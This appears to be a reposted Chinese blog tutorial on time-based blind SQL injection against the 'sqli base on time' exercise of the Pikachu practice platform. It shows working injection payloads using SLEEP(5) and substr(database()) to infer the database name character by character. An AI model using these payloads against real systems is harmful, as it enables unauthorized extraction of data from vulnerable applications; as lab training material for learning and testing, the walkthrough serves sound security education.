本文共 443 字,大约阅读时间需要 1 分钟。
打开pikachu测试平台,sqli base on time 章节。
先输入一个’ 尝试一下,发现反馈不报错。 输入kobe,发现反馈信息不变 打开浏览器的开发者工具,控制台,选择网络 输入 kobe’ and Sleep(5) #,发现延迟5秒发送。 输入错误信息,发现Sleep语句不执行。 这样我们就可以写一个判断kobe’ and if((substr(database(),1,1))=’?’,sleep(5),null)# 数据库首字母如果为真,那么暂停5秒发送,如果为假,则直接发送。 输入kobe’ and if((substr(database(),1,1))=‘a’,sleep(5),null)# 发现,直接发送,没有暂停。 以此类推,直到输入kobe’ and if((substr(database(),1,1))=‘p’,sleep(5),null)# 等待了5秒钟之后,才发送。说明猜测正确,数据库的首字母为P 这样,一次基于时间的sqli盲注就完成了!转载地址:http://hjthn.baihongyu.com/